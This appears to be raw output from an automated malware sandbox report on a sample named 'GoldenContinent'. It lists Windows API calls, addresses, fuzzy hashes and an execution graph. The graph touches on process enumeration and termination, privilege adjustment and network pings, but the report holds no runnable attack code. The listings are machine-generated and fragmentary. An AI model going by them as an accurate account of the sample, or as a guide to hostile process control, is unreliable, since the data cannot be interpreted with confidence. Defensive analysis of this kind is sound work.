                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                            • String ID: %02x%c$...
                                                                                                                                                                                                                                                                            • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                            • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                            • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                              • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                            • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                            • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                            • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00429E6D,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                            • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                              • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                            • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                            • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                            • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                            • String ID: Version
                                                                                                                                                                                                                                                                            • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                            • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                              • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                            • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                            • String ID: !N~
                                                                                                                                                                                                                                                                            • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                            • String ID: Error launching installer
                                                                                                                                                                                                                                                                            • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                            • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                            • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                            • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                              • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                            • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                            • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                            • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                            • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                            • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 190613189-0
                                                                                                                                                                                                                                                                            • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                            • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                                            Execution Coverage:3.3%
                                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                            Signature Coverage:3.5%
                                                                                                                                                                                                                                                                            Total number of Nodes:2000
                                                                                                                                                                                                                                                                            Total number of Limit Nodes:51
API calls 102448->102473 102449->102429 102489 c63fe1 81 API calls __wsopen_s 102449->102489 102451 c46ded 102454 bf8ec0 52 API calls 102451->102454 102453 c46c08 102504 c6148b 102453->102504 102468 c46df5 _wcslen 102454->102468 102456 c4691d messages 102456->102433 102469 c01b62 messages 102456->102469 102471 c01a23 messages 102456->102471 102457->102449 102488 c01ca0 8 API calls 102457->102488 102459 c46c93 102571 bfbd07 8 API calls 102459->102571 102461 c01b55 102461->102449 102461->102469 102463 c46dbf _wcslen 102463->102439 102596 bfb4c8 8 API calls 102463->102596 102465 c46c9c 102472 c6148b 8 API calls 102465->102472 102468->102441 102598 bfb4c8 8 API calls 102468->102598 102469->102448 102469->102471 102469->102473 102471->102362 102472->102473 102473->102439 102473->102471 102572 c7808f 53 API calls __wsopen_s 102473->102572 102477 c01e6d messages 102474->102477 102475 c02512 102482 c01ff7 messages 102475->102482 103311 c0be08 39 API calls 102475->103311 102477->102475 102479 c47837 102477->102479 102480 c4766b 102477->102480 102477->102482 103309 c0e322 8 API calls messages 102477->103309 102479->102482 103310 c1d2d5 39 API calls 102479->103310 103308 c1d2d5 39 API calls 102480->103308 102482->102362 102484->102379 102485->102364 102486->102364 102487->102364 102488->102461 102489->102471 102490->102456 102491->102473 102492->102469 102493->102416 102494->102473 102495->102471 102496->102473 102498 c46bed 102497->102498 102499 c76101 102497->102499 102498->102443 102498->102453 102500 c1017b 8 API calls 102499->102500 102502 c76123 102500->102502 102501 c1014b 8 API calls 102501->102502 102502->102498 102502->102501 102600 c61400 8 API calls 102502->102600 102505 c61499 102504->102505 102507 c46c32 102504->102507 102506 c1014b 8 API calls 102505->102506 102505->102507 102506->102507 102508 c02b20 102507->102508 102509 c02b61 102508->102509 102510 c02fc0 102509->102510 102511 c02b86 102509->102511 102770 c105b2 5 API calls __Init_thread_wait 102510->102770 
102512 c02ba0 102511->102512 102513 c47bd8 102511->102513 102601 c03160 102512->102601 102733 c77af9 102513->102733 102517 c02fca 102520 c0300b 102517->102520 102771 bfb329 102517->102771 102519 c47be4 102519->102473 102524 c47bed 102520->102524 102526 c0303c 102520->102526 102521 c03160 9 API calls 102523 c02bc6 102521->102523 102523->102520 102525 c02bfc 102523->102525 102781 c63fe1 81 API calls __wsopen_s 102524->102781 102525->102524 102545 c02c18 __fread_nolock 102525->102545 102778 bfb4c8 8 API calls 102526->102778 102529 c03049 102779 c0e6e8 224 API calls 102529->102779 102530 c02fe4 102777 c10568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102530->102777 102533 c47c15 102782 c63fe1 81 API calls __wsopen_s 102533->102782 102535 c47c78 102784 c761a2 53 API calls _wcslen 102535->102784 102536 c02d4c 102537 c03160 9 API calls 102536->102537 102539 c02d59 102537->102539 102546 c03160 9 API calls 102539->102546 102547 c02dd7 messages 102539->102547 102540 c1014b 8 API calls 102540->102545 102541 c03082 102780 c0fe39 8 API calls 102541->102780 102542 c1017b 8 API calls 102542->102545 102544 c02f2d 102544->102473 102545->102529 102545->102533 102545->102540 102545->102542 102545->102547 102550 c00340 224 API calls 102545->102550 102551 c02d3f 102545->102551 102552 c47c59 102545->102552 102548 c02d73 102546->102548 102547->102541 102553 c03160 9 API calls 102547->102553 102556 c02e8b messages 102547->102556 102611 c0f950 102547->102611 102618 c7ad47 102547->102618 102623 c7ab3f 102547->102623 102645 c79fe8 102547->102645 102648 c7a5b2 102547->102648 102654 c7a9ac 102547->102654 102662 c6664c 102547->102662 102669 c6f94a 102547->102669 102678 c79ffc 102547->102678 102681 c0ac3e 102547->102681 102700 c7a6aa 102547->102700 102708 c70fb8 102547->102708 102785 c63fe1 81 API calls __wsopen_s 102547->102785 102548->102547 102557 bfbed9 8 API calls 102548->102557 102550->102545 102551->102535 102551->102536 102783 c63fe1 81 API calls __wsopen_s 
102552->102783 102553->102547 102556->102544 102769 c0e322 8 API calls messages 102556->102769 102557->102547 102570->102459 102571->102465 102572->102445 102574 bf8ed5 102573->102574 102575 bf8ed2 102573->102575 102576 bf8edd 102574->102576 102577 bf8f0b 102574->102577 102575->102463 103304 c15536 26 API calls 102576->103304 102579 c36b1f 102577->102579 102582 bf8f1d 102577->102582 102587 c36a38 102577->102587 103307 c154f3 26 API calls 102579->103307 102580 bf8eed 102586 c1014b 8 API calls 102580->102586 103305 c0fe6f 51 API calls 102582->103305 102583 c36b37 102583->102583 102588 bf8ef7 102586->102588 102590 c1017b 8 API calls 102587->102590 102591 c36ab1 102587->102591 102589 bfb329 8 API calls 102588->102589 102589->102575 102592 c36a81 102590->102592 103306 c0fe6f 51 API calls 102591->103306 102593 c1014b 8 API calls 102592->102593 102594 c36aa8 102593->102594 102595 bfb329 8 API calls 102594->102595 102595->102591 102596->102439 102597->102451 102598->102441 102599->102471 102600->102502 102602 c031a1 102601->102602 102603 c0317d 102601->102603 102786 c105b2 5 API calls __Init_thread_wait 102602->102786 102610 c02bb0 102603->102610 102788 c105b2 5 API calls __Init_thread_wait 102603->102788 102605 c031ab 102605->102603 102787 c10568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102605->102787 102607 c09f47 102607->102610 102789 c10568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102607->102789 102610->102521 102790 bfc98d 102611->102790 102613 c0f964 102614 c4fb20 Sleep 102613->102614 102615 c0f96c timeGetTime 102613->102615 102616 bfc98d 39 API calls 102615->102616 102617 c0f982 102616->102617 102617->102547 102619 bf8ec0 52 API calls 102618->102619 102620 c7ad63 102619->102620 102796 c5dd87 CreateToolhelp32Snapshot Process32FirstW 102620->102796 102622 c7ad72 102622->102547 102624 bf8ec0 52 API calls 102623->102624 102625 c7ab62 102624->102625 102626 c5dd87 46 API calls 102625->102626 102627 c7ab73 102626->102627 102628 
c7abc3 OpenProcess 102627->102628 102635 c7ab78 102627->102635 102629 c7acc2 TerminateProcess 102628->102629 102630 c7abdd GetLastError 102628->102630 102631 c7ad20 CloseHandle 102629->102631 102632 c7accf GetLastError 102629->102632 102633 c7abec 102630->102633 102641 c7ac72 102630->102641 102631->102635 102638 c7ace3 102632->102638 102928 c5d715 12 API calls 102633->102928 102635->102547 102636 c7abfa 102929 c52010 11 API calls messages 102636->102929 102638->102631 102639 c7ac04 102640 c7ac08 OpenProcess 102639->102640 102644 c7ac1a 102639->102644 102640->102644 102641->102629 102641->102635 102643 c7ac70 102643->102641 102930 c51a0b AdjustTokenPrivileges CloseHandle messages 102644->102930 102931 c789b6 102645->102931 102647 c79ff8 102647->102547 102649 c7a5c5 102648->102649 102650 bf8ec0 52 API calls 102649->102650 102653 c7a5d4 102649->102653 102651 c7a632 102650->102651 103044 c618a9 102651->103044 102653->102547 102656 c7aa08 102654->102656 102661 c7a9c8 102654->102661 102655 c7aa26 102657 bfc98d 39 API calls 102655->102657 102659 c7aa8e 102655->102659 102655->102661 102656->102655 102658 bfc98d 39 API calls 102656->102658 102657->102659 102658->102655 103085 c60372 102659->103085 102661->102547 102663 bf8ec0 52 API calls 102662->102663 102664 c66662 102663->102664 103156 c5dc54 102664->103156 102666 c6666a 102667 c6666e GetLastError 102666->102667 102668 c66683 102666->102668 102667->102668 102668->102547 102670 c1017b 8 API calls 102669->102670 102671 c6f95b 102670->102671 103217 bf423c 102671->103217 102674 bf8ec0 52 API calls 102675 c6f97c GetEnvironmentVariableW 102674->102675 103220 c6160f 8 API calls 102675->103220 102677 c6f999 messages 102677->102547 102679 c789b6 119 API calls 102678->102679 102680 c7a00c 102679->102680 102680->102547 102682 bf8ec0 52 API calls 102681->102682 102683 c0ac68 102682->102683 103221 c0bc58 102683->103221 102685 c0ac7f 102686 bfc98d 39 API calls 102685->102686 102695 c0b09b _wcslen 102685->102695 102686->102695 102687 
c0bbbe 43 API calls 102687->102695 102688 c14d98 _strftime 40 API calls 102688->102695 102692 bf6c03 8 API calls 102692->102695 102693 c0b1fb 102693->102547 102694 bfc98d 39 API calls 102694->102695 102695->102687 102695->102688 102695->102692 102695->102693 102695->102694 102696 bf8ec0 52 API calls 102695->102696 102697 bf8577 8 API calls 102695->102697 103226 bf396b 102695->103226 103236 bf3907 102695->103236 103240 bf7ad5 102695->103240 103245 bfad40 8 API calls __fread_nolock 102695->103245 103246 bf7b1a 8 API calls 102695->103246 102696->102695 102697->102695 102701 c7a705 102700->102701 102707 c7a6c5 102700->102707 102702 c7a723 102701->102702 102703 bfc98d 39 API calls 102701->102703 102704 bfc98d 39 API calls 102702->102704 102705 c7a780 102702->102705 102702->102707 102703->102702 102704->102705 102706 c60372 58 API calls 102705->102706 102706->102707 102707->102547 102709 c70fe1 102708->102709 102710 c7100f WSAStartup 102709->102710 102711 bfc98d 39 API calls 102709->102711 102712 c71054 102710->102712 102732 c71023 messages 102710->102732 102714 c70ffc 102711->102714 103284 c0c1f6 102712->103284 102714->102710 102717 bfc98d 39 API calls 102714->102717 102716 bf8ec0 52 API calls 102718 c71069 102716->102718 102719 c7100b 102717->102719 103289 c0f9d4 WideCharToMultiByte 102718->103289 102719->102710 102721 c71075 inet_addr gethostbyname 102722 c71093 IcmpCreateFile 102721->102722 102721->102732 102723 c710d3 102722->102723 102722->102732 102724 c1017b 8 API calls 102723->102724 102725 c710ec 102724->102725 102726 bf423c 8 API calls 102725->102726 102727 c710f7 102726->102727 102728 c71102 IcmpSendEcho 102727->102728 102729 c7112b IcmpSendEcho 102727->102729 102730 c7114c 102728->102730 102729->102730 102731 c71212 IcmpCloseHandle WSACleanup 102730->102731 102731->102732 102732->102547 102734 c77b52 102733->102734 102735 c77b38 102733->102735 102737 c760e6 8 API calls 102734->102737 103299 c63fe1 81 API calls __wsopen_s 102735->103299 102738 c77b5d 
102737->102738 102739 c00340 223 API calls 102738->102739 102740 c77bc1 102739->102740 102741 c77b4a 102740->102741 102742 c77c03 102740->102742 102743 c77c5c 102740->102743 102741->102519 102749 c6148b 8 API calls 102742->102749 102744 c77cb0 102743->102744 102746 c77c62 102743->102746 102744->102741 102745 bf8ec0 52 API calls 102744->102745 102747 c77cc2 102745->102747 103300 c61ad8 8 API calls 102746->103300 102750 bfc2c9 8 API calls 102747->102750 102753 c77c3b 102749->102753 102754 c77ce6 CharUpperBuffW 102750->102754 102751 c77c85 103301 bfbd07 8 API calls 102751->103301 102755 c02b20 223 API calls 102753->102755 102756 c77d00 102754->102756 102755->102741 102757 c77d07 102756->102757 102758 c77d53 102756->102758 102761 c6148b 8 API calls 102757->102761 102759 bf8ec0 52 API calls 102758->102759 102760 c77d5b 102759->102760 103302 c0aa65 9 API calls 102760->103302 102763 c77d35 102761->102763 102764 c02b20 223 API calls 102763->102764 102764->102741 102765 c77d65 102765->102741 102766 bf8ec0 52 API calls 102765->102766 102767 c77d80 102766->102767 103303 bfbd07 8 API calls 102767->103303 102769->102556 102770->102517 102772 bfb338 _wcslen 102771->102772 102773 c1017b 8 API calls 102772->102773 102774 bfb360 __fread_nolock 102773->102774 102775 c1014b 8 API calls 102774->102775 102776 bfb376 102775->102776 102776->102530 102777->102520 102778->102529 102779->102541 102780->102541 102781->102547 102782->102547 102783->102547 102784->102548 102785->102547 102786->102605 102787->102603 102788->102607 102789->102610 102791 bfc99e 102790->102791 102792 bfc9a5 102790->102792 102791->102792 102795 c16641 39 API calls _strftime 102791->102795 102792->102613 102794 bfc9e8 102794->102613 102795->102794 102806 c5e80e 102796->102806 102798 c5ddd4 Process32NextW 102799 c5de86 CloseHandle 102798->102799 102800 c5ddcd 102798->102800 102799->102622 102800->102798 102800->102799 102801 bfbf73 8 API calls 102800->102801 102802 bfb329 8 API calls 102800->102802 102812 bf568e 
102800->102812 102854 bf7bb5 102800->102854 102863 c0e36b 41 API calls 102800->102863 102801->102800 102802->102800 102807 c5e819 102806->102807 102808 c5e830 102807->102808 102811 c5e836 102807->102811 102864 c16722 GetStringTypeW _strftime 102807->102864 102865 c1666b 39 API calls _strftime 102808->102865 102811->102800 102813 bfbf73 8 API calls 102812->102813 102814 bf56a4 102813->102814 102815 bfbf73 8 API calls 102814->102815 102816 bf56ac 102815->102816 102817 bfbf73 8 API calls 102816->102817 102818 bf56b4 102817->102818 102819 bfbf73 8 API calls 102818->102819 102820 bf56bc 102819->102820 102821 c34da1 102820->102821 102822 bf56f0 102820->102822 102823 bfbed9 8 API calls 102821->102823 102824 bfacc0 8 API calls 102822->102824 102825 c34daa 102823->102825 102826 bf56fe 102824->102826 102885 bfbd57 102825->102885 102878 bfadf4 102826->102878 102829 bf5708 102830 bfacc0 8 API calls 102829->102830 102831 bf5733 102829->102831 102832 bf5729 102830->102832 102833 bf5754 102831->102833 102846 bf5778 102831->102846 102853 c34dcc 102831->102853 102836 bfadf4 8 API calls 102832->102836 102833->102846 102882 bf655e 102833->102882 102835 bf5789 102840 bfbed9 8 API calls 102835->102840 102841 bf579f 102835->102841 102836->102831 102840->102841 102843 bf57b3 102841->102843 102844 bfbed9 8 API calls 102841->102844 102842 bf57be 102848 bfbed9 8 API calls 102842->102848 102851 bf57c9 102842->102851 102843->102842 102847 bfbed9 8 API calls 102843->102847 102844->102843 102845 bfacc0 8 API calls 102845->102846 102866 bfacc0 102846->102866 102847->102842 102848->102851 102849 bf655e 8 API calls 102850 c34e8c 102849->102850 102850->102846 102850->102849 102903 bfad40 8 API calls __fread_nolock 102850->102903 102851->102800 102891 bf8577 102853->102891 102855 bf7bc7 102854->102855 102856 c3641d 102854->102856 102912 bf7bd8 102855->102912 102922 c513c8 8 API calls __fread_nolock 102856->102922 102859 c36427 102861 c36433 102859->102861 102862 bfbed9 8 API calls 102859->102862 
102860 bf7bd3 102860->102800 102862->102861 102863->102800 102864->102807 102865->102811 102867 bfaccf 102866->102867 102869 bface1 102866->102869 102876 bfacda __fread_nolock 102867->102876 102905 bfc2c9 102867->102905 102869->102867 102871 c40557 102869->102871 102872 bfad07 102869->102872 102870 c405a3 __fread_nolock 102873 c1014b 8 API calls 102871->102873 102904 bf88e8 8 API calls 102872->102904 102875 c40561 102873->102875 102877 c1017b 8 API calls 102875->102877 102876->102835 102877->102867 102879 bfae0b __fread_nolock 102878->102879 102880 bfae02 102878->102880 102879->102829 102880->102879 102881 bfc2c9 8 API calls 102880->102881 102881->102879 102883 bfc2c9 8 API calls 102882->102883 102884 bf5761 102883->102884 102884->102845 102884->102846 102886 bfbd71 102885->102886 102890 bfbd64 102885->102890 102887 c1014b 8 API calls 102886->102887 102888 bfbd7b 102887->102888 102889 c1017b 8 API calls 102888->102889 102889->102890 102890->102831 102892 c36610 102891->102892 102895 bf8587 _wcslen 102891->102895 102893 bfadf4 8 API calls 102892->102893 102894 c36619 102893->102894 102894->102894 102896 bf859d 102895->102896 102897 bf85c2 102895->102897 102911 bf88e8 8 API calls 102896->102911 102898 c1014b 8 API calls 102897->102898 102900 bf85ce 102898->102900 102902 c1017b 8 API calls 102900->102902 102901 bf85a5 __fread_nolock 102901->102850 102902->102901 102903->102850 102904->102876 102906 bfc2dc 102905->102906 102907 bfc2d9 __fread_nolock 102905->102907 102908 c1014b 8 API calls 102906->102908 102907->102870 102909 bfc2e7 102908->102909 102910 c1017b 8 API calls 102909->102910 102910->102907 102911->102901 102913 bf7c1b __fread_nolock 102912->102913 102914 bf7be7 102912->102914 102913->102860 102914->102913 102915 c3644e 102914->102915 102916 bf7c0e 102914->102916 102918 c1014b 8 API calls 102915->102918 102923 bf7d74 102916->102923 102919 c3645d 102918->102919 102920 c1017b 8 API calls 102919->102920 102921 c36491 __fread_nolock 102920->102921 
